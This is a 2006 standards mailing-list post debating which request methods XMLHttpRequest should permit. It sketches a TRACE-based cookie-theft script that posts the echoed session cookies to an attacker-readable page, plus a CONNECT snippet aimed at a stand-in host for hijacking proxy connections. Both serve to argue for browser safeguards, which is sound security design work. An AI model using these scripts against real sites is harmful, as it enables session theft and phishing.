Re: Extension methods & XMLHttpRequest

Roy T. Fielding wrote:
> What browsers need to do is obey the specs.  TRACE is not a problem.
> If the browser sends already-non-secure cookies on a TRACE request,
> then the response is going to contain those cookies.

Eh?  What makes a cookie already-non-secure, as opposed to a secure
cookie?

The reasons given for blocking TRACE are to protect against a certain
type of cross-site scripting attack.  This is the example:

Site A is a wiki/blog which does not adequately sanitise content
posted to it.  There is no shortage of these.

A user logs on to site A, where a maliciously posted script loads into
the user's browser and starts doing things it shouldn't.  One of those
things is to send a TRACE to site A, look at the cookies echoed back in
the response (the cookies used to log in to the site), and post those
cookies to another page on site A.

The hacker who posted the script can then retrieve the user's cookies
and use them to impersonate the user at other times, if the cookies
are used as login credentials, which they commonly are.
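
To make the mechanism concrete, here is a rough sketch of what the
injected script might look like, assuming the browser passes TRACE
through XMLHttpRequest unchanged (the scratch-page URL is made up):

    var xhr = new XMLHttpRequest();
    // Same-origin request, so no cross-domain restriction applies.
    xhr.open("TRACE", "/", true);
    xhr.onreadystatechange = function () {
        if (xhr.readyState == 4) {
            // TRACE echoes the request back, Cookie header included,
            // in the response body.
            var echoed = xhr.responseText;
            // Stash the echoed headers somewhere on site A that the
            // attacker can read later (this URL is hypothetical).
            var drop = new XMLHttpRequest();
            drop.open("POST", "/wiki/attacker-scratch-page", true);
            drop.send(echoed);
        }
    };
    xhr.send(null);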

Your suggestion seems to be that the browser should allow TRACE but
not post cookies with the TRACE request.  There are two approaches to
that:

    1. The browser does not post cookies with _any_ XMLHttpRequest.
       That's very unhelpful - they are useful.

    2. The browser has a special rule for TRACE.

The third approach, which I suspect you have in mind, is that site A
should properly sanitise whatever is posted to it.  If site A doesn't
do that well enough, it's site A's own security hole.

Indeed, the fact that a malicious script can post to the site
indicates a serious hole.

But our job as designers of the Javascript sandbox is to limit the
damage which can be done by a script.

Being able to post to a site is one type of damage, which might be
considered serious or not, depending on the application.  Being able
to post the user's login credentials for someone else to use is
perhaps more serious.

That's the motivation for prohibiting TRACE, or for limiting the
headers which will be sent with TRACE to those which don't reveal
security information.  It's a type of damage limitation along a fairly
clear boundary: don't allow a script direct access to security credentials.
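
As a sketch of that header-limiting option, the filter inside the
browser might look something like this (the names are illustrative,
not any real browser's internals):

    // Headers which carry security credentials, and so are never sent
    // with a script-initiated TRACE.
    var SENSITIVE = {
        "cookie": true,
        "authorization": true,
        "proxy-authorization": true
    };

    function headersForScriptedTrace(headers) {
        var safe = {};
        for (var name in headers) {
            if (!SENSITIVE[name.toLowerCase()])
                safe[name] = headers[name];
        }
        return safe;
    }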

> So don't do that.  Don't whitelist methods -- whitelist the
> information the browser is allowed to send in *any* request.  Allow
> the user to configure the browser differently when new information
> is needed.

Perhaps.  But it's clear that ordinary cookies are useful with
XMLHttpRequest GET/POST requests.

> CONNECT is a protocol switch.  The only real risks for CONNECT are
> for proxies that are tricked into connecting to the reserved ports
> of older protocols.

No, there is another risk which is equally serious.

Example: Site A is a dodgy site which someone visits (let's say by
accident).  Site B is the user's bank.

The user visits site A, which sends a page containing a script that
uses XMLHttpRequest to send a CONNECT request.  The request goes
through a proxy between the user and site A, and the proxy handles it
by successfully connecting to port 443 on site A.

The user (shocked at the pictures) quickly closes their window, then
later connects to site B.

The browser then sends requests to site B *using the same connection
to their proxy*.  Persistent HTTP does this.

This assumes the browser did not recognise XMLHttpRequest + CONNECT as
different from other request methods.

This means the browser sends subsequent requests for site B to site A.
Site A can proxy them (silently) to site B, and thus accomplish a
stealth phishing attack.  Nothing shows in the URL bar; only sniffing
the network would reveal that the requests have been hijacked.
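
For concreteness, the trigger on the scripting side is trivial,
assuming the implementation just passes the method through to the
proxy; everything else happens at the connection level, invisible to
the script (siteA.example stands in for the dodgy site):

    var xhr = new XMLHttpRequest();
    // If the implementation passes CONNECT straight through, the proxy
    // turns the browser's persistent connection into a raw tunnel to
    // port 443 on site A.
    xhr.open("CONNECT", "https://siteA.example/", true);
    xhr.send(null);
    // From here on, any later request the browser sends down this
    // reused proxy connection actually goes to site A.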

There are a couple of obvious ways to prevent this:

    1. Don't allow CONNECT with XMLHttpRequest.

or

    2. Ensure the browser treats CONNECT differently from other
       methods with XMLHttpRequest: by marking the connection as
       non-reusable.

> All HTTP methods fall into safe/unsafe categories.  It is absolutely
> necessary that the browser distinguish between safe requests
> (hyperlinks) and unsafe requests (a la buttons).  That is a browser
> GUI issue and, for scripting, requires a user ack prior to sending the
> unsafe request.  By default, all unknown methods should be considered
> unsafe until the user configures otherwise.  There is no need for the
> *protocols* to define whitelists when the developers can do so on
> their own, based on their own applications, and according to their
> own user needs.

I agree with you that the browser GUI should ultimately be the place
where whitelist/blacklist/whatever policy is configured.  This is no
different from, for example, whether a script is allowed to access
local files or do cross-domain requests.

However, I think it makes good sense for the XMLHttpRequest
recommendation to _recommend_ a common policy.

After all, the whole point of the recommendation document is to
provide some common ground, so that people know what is likely to work
without user intervention (or will, once browsers claim compliance
with the recommendation), and what is not likely to work in that way.

In those terms, a whitelist makes sense.  So something like this:

    Implementations which conform to this recommendation support at
    minimum GET and POST requests to the same domain without user
    intervention.  Cookies, Accept etc. will be sent with these
    requests as with ordinary page requests.  (Script authors can
    depend on this).

    Implementations MAY allow other request methods, MAY allow
    cross-domain requests, MAY require user intervention to enable any
    of these things, and MAY apply implementation-defined restrictions
    on what combinations are allowed.  However, implementations do not
    have to allow any of these things to conform to this
    recommendation.
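
In implementation terms, the gate a conforming browser applies in
open() could be as simple as the following sketch (sameOrigin and
implementationPolicy are made-up helpers):

    // Methods a conforming implementation allows without user
    // intervention, for same-domain requests only.
    var ALWAYS_ALLOWED = { "GET": true, "POST": true };

    // sameOrigin() and implementationPolicy() are hypothetical helpers.
    function methodAllowed(method, url, documentOrigin) {
        var m = method.toUpperCase();
        if (ALWAYS_ALLOWED[m] && sameOrigin(url, documentOrigin))
            return true;    // script authors can rely on this much
        // Everything else is implementation-defined: allow it, refuse
        // it, or ask the user first.
        return implementationPolicy(m, url, documentOrigin);
    }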

-- Jamie

Received on Sunday, 11 June 2006 20:06:40 UTC